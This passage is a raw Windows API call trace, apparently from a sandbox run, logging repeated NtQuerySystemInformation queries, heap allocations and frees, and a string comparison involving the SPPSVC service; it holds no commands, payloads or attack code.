[0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.424] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0240.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.449] GetProcessHeap () returned 0x2026c630000 [0240.449] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807c40 [0240.449] GetProcessHeap () returned 0x2026c630000 [0240.449] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7640 [0240.451] GetProcessHeap () returned 0x2026c630000 [0240.451] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x118) returned 0x2026d732fc0 [0240.452] GetProcessHeap () returned 0x2026c630000 [0240.452] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x120) returned 0x2026c63a970 [0240.452] GetProcessHeap () returned 0x2026c630000 [0240.452] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d886530 [0240.452] GetProcessHeap () returned 0x2026c630000 [0240.452] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x128) returned 0x2026c63ae30 [0240.452] GetProcessHeap () returned 0x2026c630000 [0240.452] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d808110 [0240.452] GetProcessHeap () returned 0x2026c630000 [0240.452] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7660 [0240.452] GetProcessHeap () returned 0x2026c630000 [0240.452] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63ad00 | out: hHeap=0x2026c630000) returned 1 [0240.453] GetProcessHeap () returned 0x2026c630000 [0240.453] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1dc) returned 0x2026c6c7bf0 [0240.453] GetProcessHeap () returned 0x2026c630000 [0240.453] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfc) returned 0x2026c693430 [0240.453] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751f7ed28 | out: phModule=0xc751f7ed28*=0x7ffcea380000) returned 1 [0240.453] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0240.453] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751f7ee50, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751f7ee50, ResultLength=0x0) returned 0x0 [0240.455] GetProcessHeap () returned 0x2026c630000 [0240.455] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8862b0 [0240.455] GetProcessHeap () returned 0x2026c630000 [0240.455] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x48) returned 0x2026d778a20 [0240.455] GetProcessHeap () returned 0x2026c630000 [0240.455] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d808320 [0240.455] GetProcessHeap () returned 0x2026c630000 [0240.455] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7670 [0240.456] GetProcessHeap () returned 0x2026c630000 [0240.456] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x34) returned 0x2026d886230 [0240.456] GetProcessHeap () returned 0x2026c630000 [0240.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63a970 | out: hHeap=0x2026c630000) returned 1 [0240.456] GetProcessHeap () returned 0x2026c630000 [0240.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63ae30 | out: hHeap=0x2026c630000) returned 1 [0240.456] GetProcessHeap () returned 0x2026c630000 [0240.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d808110 | out: hHeap=0x2026c630000) returned 1 [0240.456] GetProcessHeap () returned 0x2026c630000 [0240.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7660 | out: hHeap=0x2026c630000) returned 1 [0240.456] GetProcessHeap () returned 0x2026c630000 [0240.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d886530 | out: hHeap=0x2026c630000) returned 1 [0240.456] GetProcessHeap () returned 0x2026c630000 [0240.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6c7bf0 | out: hHeap=0x2026c630000) returned 1 [0240.456] GetProcessHeap () returned 0x2026c630000 [0240.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c693430 | out: hHeap=0x2026c630000) returned 1 [0240.456] GetProcessHeap () returned 0x2026c630000 [0240.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d778a20 | out: hHeap=0x2026c630000) returned 1 [0240.456] GetProcessHeap () returned 0x2026c630000 [0240.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d808320 | out: hHeap=0x2026c630000) returned 1 [0240.456] GetProcessHeap () returned 0x2026c630000 [0240.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7670 | out: hHeap=0x2026c630000) returned 1 [0240.456] GetProcessHeap () returned 0x2026c630000 [0240.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8862b0 | out: hHeap=0x2026c630000) returned 1 [0240.456] GetProcessHeap () returned 0x2026c630000 [0240.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d778f70 | out: hHeap=0x2026c630000) returned 1 [0240.457] GetProcessHeap () returned 0x2026c630000 [0240.457] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d732fc0 | out: hHeap=0x2026c630000) returned 1 [0240.457] GetProcessHeap () returned 0x2026c630000 [0240.457] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d886230 | out: hHeap=0x2026c630000) returned 1 [0240.457] GetProcessHeap () returned 0x2026c630000 [0240.457] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807c40 | out: hHeap=0x2026c630000) returned 1 [0240.457] GetProcessHeap () returned 0x2026c630000 [0240.457] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7640 | out: hHeap=0x2026c630000) returned 1 [0240.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, 